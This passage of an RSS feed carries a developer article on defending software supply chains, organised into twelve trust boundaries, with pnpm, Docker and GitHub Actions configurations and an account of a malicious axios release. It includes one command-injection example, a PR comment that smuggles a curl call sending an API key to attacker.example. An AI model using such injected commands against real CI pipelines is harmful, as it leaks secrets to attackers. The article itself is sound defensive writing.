&lt;li&gt;PR-time dependency CVE gate (&lt;code&gt;pnpm audit&lt;/code&gt; + per-stack equivalents above) with documented expiry-forced allowlist.&lt;/li&gt;
&lt;li&gt;Logger redaction at framework level for auth headers, cookies, password / token / secret keys.&lt;/li&gt;
&lt;li&gt;CODEOWNERS covering every file in this list.&lt;/li&gt;
&lt;/ul&gt;
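&lt;p&gt;The digest-pin item is one of the easiest to automate. A sketch of the gate (function name and layout assumed, not our exact script):&lt;/p&gt;

```shell
# check_pins DIR: return non-zero if any Dockerfile under DIR has a FROM
# line that is not pinned to an @sha256: digest. Multi-stage references
# like "FROM base AS build" would need an extra skip rule in a real repo.
check_pins() {
  unpinned=$(grep -rhE '^FROM ' --include='Dockerfile*' "$1" | grep -v '@sha256:')
  if [ -n "$unpinned" ]; then
    printf 'un-pinned FROM lines:\n%s\n' "$unpinned"
    return 1
  fi
  echo 'all FROM lines digest-pinned'
}
```

&lt;p&gt;Run it as a required status check next to the lockfile and permissions gates.&lt;/p&gt;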

&lt;p&gt;Each item is a few lines of configuration. Total cost is roughly the week described above for a multi-project monorepo; smaller repos proportionally less. The benefit, in our case, was being able to stop checking my phone on Sundays.&lt;/p&gt;

</description>
      <category>security</category>
      <category>devsecops</category>
      <category>axios</category>
      <category>supplychain</category>
    </item>
    <item>
      <title>Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1</title>
      <dc:creator>Ahmad Kanj</dc:creator>
      <pubDate>Fri, 08 May 2026 12:38:49 +0000</pubDate>
      <link>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-54ok</link>
      <guid>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-54ok</guid>
      <description>&lt;p&gt;On March 30, 2026, an attacker who had stolen an &lt;code&gt;axios&lt;/code&gt; maintainer's npm publish credentials pushed &lt;code&gt;axios@1.14.1&lt;/code&gt; to the registry. The version looked like a normal patch a single-digit bump from 1.14.0. It was live for roughly three hours before the maintainer rotated credentials and the version was unpublished.&lt;/p&gt;

&lt;p&gt;Three hours, on a Monday, during peak CI/CD hours across multiple time zones. Any team running &lt;code&gt;pnpm install&lt;/code&gt; or &lt;code&gt;npm install&lt;/code&gt; against a &lt;code&gt;^1.14.0&lt;/code&gt; constraint pulled &lt;code&gt;1.14.1&lt;/code&gt; automatically. (&lt;code&gt;^1.14.0&lt;/code&gt; means "any 1.x.y ≥ 1.14.0"; most package managers express the same idea: &lt;code&gt;~=&lt;/code&gt; in pip, &lt;code&gt;^&lt;/code&gt; in Cargo, &lt;code&gt;~&amp;gt;&lt;/code&gt; in Gemfile.) No CVE was published during the window. SAST tools had nothing to flag.&lt;/p&gt;
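&lt;p&gt;A toy illustration of why &lt;code&gt;1.14.1&lt;/code&gt; flowed in automatically (hand-rolled comparison, plain MAJOR.MINOR.PATCH only; real resolvers use a semver library):&lt;/p&gt;

```shell
# in_caret_range FLOOR CANDIDATE: does CANDIDATE satisfy ^FLOOR?
# ^1.14.0 means: same major version, and at or above 1.14.0.
in_caret_range() {
  floor=$1; candidate=$2
  if [ "${candidate%%.*}" != "${floor%%.*}" ]; then return 1; fi
  lowest=$(printf '%s\n%s\n' "$floor" "$candidate" | sort -t. -k1,1n -k2,2n -k3,3n | head -n1)
  [ "$lowest" = "$floor" ]
}

if in_caret_range 1.14.0 1.14.1; then echo '1.14.1 satisfies ^1.14.0: pulled automatically'; fi
if ! in_caret_range 1.14.0 2.0.0; then echo '2.0.0 does not: major bump blocked'; fi
```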

&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; added one new transitive dependency (a dependency-of-a-dependency, pulled in indirectly): &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;. That package's &lt;code&gt;postinstall&lt;/code&gt; script (a hook the package manager runs automatically after install, the canonical Node footgun, with analogues in pip's &lt;code&gt;setup.py&lt;/code&gt; build hooks, Ruby's &lt;code&gt;gem extconf&lt;/code&gt;, and Cargo's &lt;code&gt;build.rs&lt;/code&gt;) ran &lt;code&gt;node setup.js&lt;/code&gt;, which downloaded a Python-based RAT (Remote Access Trojan) from a C2 (command-and-control) server, exfiltrated environment variables and cloud credentials, and attempted to establish persistence on the build host. The compromise wouldn't have been visible to anyone glancing at the lockfile diff: a new transitive in a stable utility is exactly the kind of churn most teams approve without thinking.&lt;/p&gt;

&lt;p&gt;Three hours is forever in CI. By the time npm pulled the version, the bytes had already shipped to thousands of build hosts.&lt;/p&gt;

&lt;p&gt;Two weeks before that incident, I was reading through a workflow in our own repo that lets engineers trigger an LLM code review by commenting &lt;code&gt;/review&lt;/code&gt; on a pull request. I stopped on this line:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/opencode-review.yml:108&lt;/span&gt;
&lt;span class="s"&gt;COMMENT_BODY="${{ github.event.comment.body || '' }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;if:&lt;/code&gt; block above it gated only on &lt;code&gt;startsWith(comment.body, '/review')&lt;/code&gt;. There was no &lt;code&gt;comment.author_association&lt;/code&gt; check. Anyone who could comment on a PR, including a drive-by commenter from a public fork, could trigger this workflow. The job loaded &lt;code&gt;OPENROUTER_API_KEY&lt;/code&gt; from AWS Secrets Manager and ran with &lt;code&gt;pull-requests: write&lt;/code&gt;, &lt;code&gt;issues: write&lt;/code&gt;, and AWS OIDC (OpenID Connect short-lived workload identity, used here instead of long-lived API keys) in scope.&lt;/p&gt;

&lt;p&gt;A comment body of &lt;code&gt;/review"; curl -X POST attacker.example/x -d "$OPENROUTER_API_KEY&lt;/code&gt; would have run on the next CI build. CWE-78: OS command injection, untrusted input concatenated into a shell command. Found, scoped, fixed in a four-line diff.&lt;/p&gt;
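&lt;p&gt;The shape of the fix (illustrative, not the exact four-line diff): gate the trigger on &lt;code&gt;author_association&lt;/code&gt;, and pass the comment body through an environment variable so the shell never sees the raw interpolation:&lt;/p&gt;

```yaml
jobs:
  review:
    # 1. Gate on who commented, not only on what they typed.
    if: |
      startsWith(github.event.comment.body, '/review') &amp;&amp;
      contains(fromJson('["OWNER","MEMBER","COLLABORATOR"]'),
               github.event.comment.author_association)
    runs-on: ubuntu-latest
    steps:
      - name: run review
        # 2. Untrusted input enters as an env var; "$COMMENT_BODY" is data
        #    to the shell, never syntax. CWE-78 vector closed.
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
        run: |
          printf '%s\n' "$COMMENT_BODY"
```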

&lt;p&gt;Two attacks, very different mechanics. axios was a credential-theft → publish → postinstall chain at the registry boundary. The CWE-78 was a comment-string interpolation at the workflow boundary. The connection: in both cases the attacker didn't write code "in" the repo. They injected code by abusing a trust relationship: we trusted axios's npm releases; we trusted GitHub event input. The perimeter is no longer your application. It's everything that runs before, during, and after your build, and the defense has to live in those same places.&lt;/p&gt;

&lt;p&gt;I work on a multi-project monorepo (a single git repository hosting many services and libraries, JavaScript and TypeScript in our case, but the framework below maps to any monorepo or polyrepo, any language). A month after &lt;code&gt;axios@1.14.1&lt;/code&gt; shipped, a Slack message landed in our channel: &lt;em&gt;"we have Wiz, SonarCloud, gitleaks, Renovate but are we good?"&lt;/em&gt; Seven days later I had a triaged P0/P1/P2 list: 12 P0s (auth, secrets, registry trust), 18 P1s (pinning, permissions, lifecycle), 17 P2s (logging, SBOM, hardening), and a branch with 48 files changed and +2,487 / −646 lines of supply-chain controls.&lt;/p&gt;

&lt;p&gt;What follows is the framework I use, the specific findings I hit, the trade-offs I made, and the equivalent control in your stack whether your repo is npm, pip, Maven, Go modules, Cargo, or RubyGems; whether your CI is GitHub Actions, GitLab, Buildkite, or Jenkins. The worked example here is pnpm and GitHub Actions because that's where I shipped it. The boundaries are stack-neutral.&lt;/p&gt;




&lt;h2&gt;
  
  
  Where the attack surface actually lives now
&lt;/h2&gt;

&lt;p&gt;Your application's attack surface is bounded. A handful of endpoints, an auth system, a database. You can audit it, pen-test it, threat-model it on a whiteboard in an afternoon.&lt;/p&gt;

&lt;p&gt;Your supply chain is not bounded. It's the transitive closure of every package you import, every CI Action / GitLab include / Buildkite plugin in every workflow, every base image &lt;code&gt;FROM&lt;/code&gt; line in every Dockerfile, every binary your CI runner downloads at build time, every preset, every fork, every "trusted" community helper.&lt;/p&gt;

&lt;p&gt;The math doesn't work in your favour. A typical mid-sized application resolves on the order of 1,000–3,000 transitive dependencies in its lockfile (the resolved-versions file your package manager writes: &lt;code&gt;package-lock.json&lt;/code&gt;, &lt;code&gt;Pipfile.lock&lt;/code&gt;, &lt;code&gt;Cargo.lock&lt;/code&gt;, &lt;code&gt;Gemfile.lock&lt;/code&gt;, &lt;code&gt;go.sum&lt;/code&gt;). A typical CI pipeline chains 10–30 third-party Actions / plugins. Across a multi-year horizon, the probability that none of those maintainers gets phished, social-engineered, or leaks a publish token approaches zero.&lt;/p&gt;

&lt;p&gt;Recent incidents to anchor frequency:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;2018: &lt;code&gt;event-stream&lt;/code&gt; (npm advisory 737):&lt;/strong&gt; maintainer handed the package to a malicious "helpful contributor" who added a payload in a sub-dependency. Targeted exfiltration of private keys from the Copay/&lt;code&gt;copay-dash&lt;/code&gt; Bitcoin wallet specifically: a conditional payload, with no effect on other consumers.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;ua-parser-js&lt;/code&gt;:&lt;/strong&gt; npm account takeover. Crypto miner and credential theft on every install. ~4 hours before takedown.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;codecov&lt;/code&gt; bash uploader (CVE-2021-32699):&lt;/strong&gt; modified upload script harvested CI environment variables. HashiCorp, Twilio, Confluent affected.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2022: &lt;code&gt;node-ipc&lt;/code&gt; (CVE-2022-23812):&lt;/strong&gt; maintainer protestware. Wiped files on Russian and Belarusian IPs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;xz-utils&lt;/code&gt; (CVE-2024-3094):&lt;/strong&gt; multi-year insider. The "Jia Tan" persona spent ~2 years building trust before merging an OpenSSH authentication backdoor via &lt;code&gt;liblzma&lt;/code&gt; linkage with a specific Ed448 key. Discovered by Postgres engineer Andres Freund investigating ~500 ms of &lt;code&gt;sshd&lt;/code&gt; login latency, before the affected versions reached most stable distributions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;@solana/web3.js&lt;/code&gt; (GHSA-7493-mqf3-cv5g):&lt;/strong&gt; npm token compromise. Wallet drainer in published versions for ~5 hours.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: &lt;code&gt;tj-actions/changed-files&lt;/code&gt; (CVE-2025-30066):&lt;/strong&gt; chained through &lt;code&gt;reviewdog/action-setup&lt;/code&gt; (CVE-2025-30154) → stolen PAT → retroactive semver-tag rewrite. ~218 repos confirmed leaked secrets out of ~23,000 references per StepSecurity / Wiz post-incident telemetry.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Shai-Hulud npm worm:&lt;/strong&gt; the first true self-replicating npm worm. A &lt;code&gt;postinstall&lt;/code&gt; harvested maintainer npm tokens and re-published the worm into every other package the victim maintained. ~180 packages compromised across multiple maintainer namespaces.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Nx &lt;code&gt;s1ngularity&lt;/code&gt; worm:&lt;/strong&gt; npm postinstall on compromised Nx versions harvested GitHub PATs, SSH keys, and crypto wallets from build hosts; backdoored downstream &lt;code&gt;nx-init-&lt;/code&gt; repositories. Directly relevant to anyone on an Nx monorepo.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2026: &lt;code&gt;axios@1.14.1&lt;/code&gt;:&lt;/strong&gt; as above.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Strip the variations and you get four primitives that every modern attack chains together: &lt;strong&gt;dependency injection&lt;/strong&gt; (typosquats, dependency confusion, maintainer compromise), &lt;strong&gt;build-time injection&lt;/strong&gt; (postinstall hooks, curl-bashed installers, malicious Actions), &lt;strong&gt;mutable-reference rewrite&lt;/strong&gt; (tag rewrites, branch tracking, CDN URLs without integrity), and &lt;strong&gt;trust-relationship abuse&lt;/strong&gt; (compromise a tooling vendor, phish past an MFA prompt, steal a token from a CI log). axios chained (4) → (1) → (2). tj-actions chained (4) → (1) → (3) → (2). Any single layer of defense would have broken either chain. Most repos had none of them.&lt;/p&gt;




&lt;h2&gt;
  
  
  The twelve boundaries
&lt;/h2&gt;

&lt;p&gt;Security engineers think in &lt;strong&gt;boundaries&lt;/strong&gt;: points where trust transfers from one entity to another. Each boundary is a place attackers operate and a place defenders need a control. The twelve below split into three phases: what enters your repo (1–4), what runs during your build (5–9), and what ships at runtime (10–12), plus a final section on what to do when one of them fails. Some will.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 1 Source-side: what enters your repo
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 1: Source → Repository (Who can write to &lt;code&gt;main&lt;/code&gt;?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; insider with too-broad write access; accidental merge of malicious code.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt; branch protection, required reviewers, CODEOWNERS for security-sensitive paths (workflows, Dockerfiles, dependency manifests). Force-push protection on protected branches. Required status checks must include the controls below.&lt;/p&gt;

&lt;p&gt;The forge-level (GitHub / GitLab / Bitbucket / Gerrit) primitives differ; the rule is identical: humans cannot push to &lt;code&gt;main&lt;/code&gt;; only the merge bot can, and only after policy passes.&lt;/p&gt;
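&lt;p&gt;The CODEOWNERS half of that rule can be this small (paths and team name illustrative):&lt;/p&gt;

```text
# Security-sensitive paths: a platform-security review is required to merge.
/.github/workflows/    @yourorg/platform-security
**/Dockerfile*         @yourorg/platform-security
pnpm-lock.yaml         @yourorg/platform-security
pnpm-workspace.yaml    @yourorg/platform-security
```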
&lt;h4&gt;
  
  
  Boundary 2: Maintainer → Package (Is this dependency safe?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; typosquats, dependency confusion (publishing a public package whose name shadows a private one, tricking the resolver), maintainer compromise. &lt;code&gt;axios@1.14.1&lt;/code&gt; is the canonical example of the third: published from a stolen credential, malicious for three hours, gone afterwards.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls registry-time:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pin to immutable identifiers.&lt;/strong&gt; Lockfile committed; exact-version constraints; no caret/tilde ranges in production dependencies; &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt; (or &lt;code&gt;npm ci&lt;/code&gt;, &lt;code&gt;pip install --require-hashes&lt;/code&gt;, &lt;code&gt;cargo --frozen --locked&lt;/code&gt;, &lt;code&gt;mvn -B verify&lt;/code&gt;, &lt;code&gt;bundle install --frozen&lt;/code&gt;, &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;) in CI. The general invariant: every dependency entry resolves to a content-addressed artifact, not a URL.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cooldown on freshly published versions.&lt;/strong&gt; Reject packages younger than N days, on the premise that fresh-publish malware is detected and yanked within 24–72 hours. The premise has limits: &lt;code&gt;xz-utils&lt;/code&gt; ran for ~2 years undetected, so this control buys hours-to-days of latency, not certainty.&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;   &lt;span class="c1"&gt;# pnpm-workspace.yaml value is in minutes; 4320 min = 72 h = 3 days&lt;/span&gt;
   &lt;span class="na"&gt;minimumReleaseAge&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4320&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; was unpublished within three hours. With &lt;code&gt;minimumReleaseAge: 4320&lt;/code&gt;, pnpm would have refused to install it for 72 hours after publish. By the time the install would have unblocked, the malicious version was already gone.&lt;/p&gt;

&lt;p&gt;Stack-neutral: pnpm has this natively; Renovate's &lt;code&gt;minimumReleaseAge&lt;/code&gt; config covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform, and any other ecosystem Renovate manages. For stacks without native or Renovate support, layer reputation signals: &lt;strong&gt;Socket&lt;/strong&gt; (behavioural risk score), &lt;strong&gt;Phylum&lt;/strong&gt; (heuristic quarantine), &lt;strong&gt;OSV-Scanner&lt;/strong&gt; + &lt;strong&gt;EPSS&lt;/strong&gt; scores for exploit-likelihood prioritisation, &lt;strong&gt;OpenSSF Scorecard&lt;/strong&gt; for upstream maintenance health, &lt;code&gt;npm audit signatures&lt;/code&gt; for registry signature verification.&lt;/p&gt;
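&lt;p&gt;The Renovate version of the cooldown, for ecosystems without a native one (a sketch; &lt;code&gt;config:recommended&lt;/code&gt; assumed as the base preset):&lt;/p&gt;

```json
{
  "extends": ["config:recommended"],
  "minimumReleaseAge": "3 days"
}
```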

&lt;ol start="3"&gt;
&lt;li&gt;
&lt;strong&gt;Provenance.&lt;/strong&gt; Where available, prefer packages published with provenance attestations. &lt;code&gt;npm publish --provenance&lt;/code&gt; (since npm 9.5) records a signed Sigstore provenance entry binding the published tarball to the GitHub Actions workflow that built it. PyPI Trusted Publishers + PEP 740 attestations are the Python equivalent. Maven Central PGP signatures + &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for Java. Provenance doesn't stop a credential-theft attack like axios (the malicious workflow would still produce a signed entry), but it gives forensics a starting point.&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; registry compromise, off-registry tarballs without integrity, mid-flight tampering.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; lockfile committed; integrity hash (&lt;code&gt;sha512:&lt;/code&gt;, &lt;code&gt;sha256:&lt;/code&gt;, OCI digest) on every entry; CI install command refuses to mutate the lockfile. &lt;strong&gt;Easy thing to miss:&lt;/strong&gt; a lockfile entry like &lt;code&gt;tarball: https://cdn.somehost.com/foo.tgz&lt;/code&gt; without an &lt;code&gt;integrity:&lt;/code&gt; field is functionally &lt;code&gt;latest&lt;/code&gt;. Audit yours for entries where the hash field is empty or points to a URL the registry doesn't verify.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# tools/scripts/verify-supply-chain.sh runs in CI&lt;/span&gt;
&lt;span class="c"&gt;# Fails if the lockfile contains any off-registry tarball not on this allowlist.&lt;/span&gt;
&lt;span class="nv"&gt;EXPECTED_TARBALLS&lt;/span&gt;&lt;span class="o"&gt;=(&lt;/span&gt;
  &lt;span class="s2"&gt;"https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz"&lt;/span&gt;  &lt;span class="c"&gt;# SheetJS withdrew xlsx from npm in 2023&lt;/span&gt;
&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In retrospect, this single grep-equivalent check would also have flagged the &lt;code&gt;axios@1.14.1&lt;/code&gt; situation early: a brand-new transitive (&lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;) appeared in the lockfile diff. A mandatory PR-time review on lockfile additions catches what the eye doesn't.&lt;/p&gt;

&lt;p&gt;The general invariant translates: pip's &lt;code&gt;--require-hashes&lt;/code&gt;, Cargo's checksum field, Maven's &lt;code&gt;--strict-checksums&lt;/code&gt;, NuGet package signing, Go's module sum database. Every modern package manager has the primitive; the discipline is auditing for the entries where it isn't enforced.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 4: Install → Lifecycle scripts (What runs on install?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; malicious lifecycle hooks. The axios attack's payload ran here. &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;'s entire malicious behaviour was a &lt;code&gt;postinstall: node setup.js&lt;/code&gt;. Without that hook, the package would have sat on disk doing nothing until something &lt;code&gt;require()&lt;/code&gt;'d it, and &lt;code&gt;axios&lt;/code&gt; never imports &lt;code&gt;plain-crypto-js&lt;/code&gt;. The postinstall was the only thing that turned a passive disk write into RCE during install.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny on install scripts&lt;/strong&gt;, allowlist of who may run them:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="nl"&gt;"onlyBuiltDependencies"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"esbuild"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@swc/core"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@datadog/native-iast-taint-tracking"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"prisma"&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
   &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;plain-crypto-js&lt;/code&gt; would not have been on any team's allowlist. &lt;code&gt;pnpm install --ignore-scripts&lt;/code&gt; (read-only CI workflows) and &lt;code&gt;onlyBuiltDependencies&lt;/code&gt; (pnpm 10) each, independently, neutralise the postinstall vector.&lt;/p&gt;
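&lt;p&gt;In practice that splits CI into two install shapes (a sketch; step layout illustrative):&lt;/p&gt;

```yaml
# Read-only jobs (lint, test, typecheck) never need lifecycle scripts:
- run: pnpm install --frozen-lockfile --ignore-scripts
# Jobs that genuinely build native deps rely on the onlyBuiltDependencies
# allowlist instead, so only the named packages may run hooks:
- run: pnpm install --frozen-lockfile
```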

&lt;ol start="2"&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Behavioural quarantine.&lt;/strong&gt; &lt;code&gt;Socket&lt;/code&gt; and &lt;code&gt;Phylum&lt;/code&gt; analyse new transitives for suspicious patterns (network calls, file-system access, dynamic eval) before they reach your lockfile. &lt;code&gt;npq&lt;/code&gt; wraps &lt;code&gt;npm install&lt;/code&gt; to prompt before installing freshly published packages. None of these would catch a sufficiently subtle payload, but &lt;code&gt;plain-crypto-js&lt;/code&gt;'s &lt;code&gt;node setup.js&lt;/code&gt; → C2 download is exactly the shape they flag.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Build-host sandboxing.&lt;/strong&gt; Run installs inside an ephemeral container with no network egress except to the registry; or use Bubblewrap / Firejail / Chainguard's hardened images. Defence-in-depth for the case where the lifecycle gate fails open.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;The limit:&lt;/strong&gt; lifecycle gates block &lt;code&gt;preinstall&lt;/code&gt; / &lt;code&gt;install&lt;/code&gt; / &lt;code&gt;postinstall&lt;/code&gt;. They do not prevent module-load-time top-level execution when an attacker-controlled package gets &lt;code&gt;require()&lt;/code&gt;'d or &lt;code&gt;import&lt;/code&gt;'d during &lt;code&gt;vitest&lt;/code&gt;, &lt;code&gt;tsc&lt;/code&gt;, &lt;code&gt;eslint&lt;/code&gt;, or any other tool that imports your code graph. The &lt;code&gt;minimumReleaseAge&lt;/code&gt; cooldown (Boundary 2) is the layer behind that.&lt;/p&gt;
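&lt;p&gt;A tiny demo of that limit (&lt;code&gt;evil&lt;/code&gt; is a stand-in package name): no lifecycle script anywhere, yet code runs the moment anything imports the package:&lt;/p&gt;

```shell
# Fake an installed package with top-level side effects and no scripts.
mkdir -p demo/node_modules/evil
printf '%s\n' 'console.log("ran at require() time, no postinstall needed")' \
  | tee demo/node_modules/evil/index.js
printf '%s\n' '{"name":"evil","version":"1.0.0","main":"index.js"}' \
  | tee demo/node_modules/evil/package.json
# --ignore-scripts would not help here: nothing above is a lifecycle hook.
cd demo
node -e 'require("evil")'
```

&lt;p&gt;The final &lt;code&gt;node -e&lt;/code&gt; line prints the message even though no install script ever ran.&lt;/p&gt;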

&lt;p&gt;Stack equivalents: pip's risky surface is &lt;code&gt;setup.py&lt;/code&gt; install hooks (mitigate with &lt;code&gt;--only-binary=:all:&lt;/code&gt;); Ruby's is &lt;code&gt;gem install&lt;/code&gt; running &lt;code&gt;extconf.rb&lt;/code&gt;; Cargo's is &lt;code&gt;build.rs&lt;/code&gt; (sandbox via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans); .NET's modern PackageReference does not run scripts (legacy &lt;code&gt;packages.config&lt;/code&gt; does); Maven and Gradle's are build plugins (audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; and &lt;code&gt;buildscript { dependencies }&lt;/code&gt;).&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 2 Build-side: what runs during your build
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 5: Source → Image (Is our build environment trustworthy?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; base image tag rewrite, secrets baked into image layers.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pin every &lt;code&gt;FROM&lt;/code&gt; by &lt;code&gt;@sha256:&amp;lt;digest&amp;gt;&lt;/code&gt;.&lt;/strong&gt; Tags are mutable; digests are content-addressed (the SHA changes if the bytes change, so a rewrite is detectable).
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;   FROM node:20.11.1-alpine3.19@sha256:735dd688da64d22ebd9... AS base
   USER node
   CMD ["node", "dist/main.js"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ol start="2"&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Drop privileges with &lt;code&gt;USER&lt;/code&gt; before &lt;code&gt;CMD&lt;/code&gt;.&lt;/strong&gt; For Node images: &lt;code&gt;USER node&lt;/code&gt;. For nginx: switch to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt; (drop-in non-root replacement listening on 8080).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Never put secrets in &lt;code&gt;ARG&lt;/code&gt; defaults:&lt;/strong&gt; they persist in &lt;code&gt;docker history&lt;/code&gt;. Use BuildKit &lt;code&gt;--mount=type=secret&lt;/code&gt; for build-time secrets.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hermetic builds for the highest tier.&lt;/strong&gt; Bazel &lt;code&gt;rules_oci&lt;/code&gt;, Nix &lt;code&gt;dockerTools&lt;/code&gt;, Chainguard's &lt;code&gt;apko&lt;/code&gt; + &lt;code&gt;melange&lt;/code&gt; produce reproducible images where every byte is content-addressed back to source. Overkill for most teams; required for SLSA L3+.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
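&lt;p&gt;The BuildKit secret mount from point 3, sketched (secret id and target path illustrative):&lt;/p&gt;

```docker
# Mounted for this RUN step only; never written into an image layer,
# unlike an ARG default, which survives in docker history.
# Build with: docker build --secret id=npmrc,src=$HOME/.npmrc .
RUN --mount=type=secret,id=npmrc,target=/root/.npmrc \
    pnpm install --frozen-lockfile
```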
&lt;h4&gt;
  
  
  Boundary 6: Image → Registry (Can downstream verify what we shipped?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; image tag rewrite at the registry; image swap; "did we actually ship this build?" forensics gap.&lt;/p&gt;

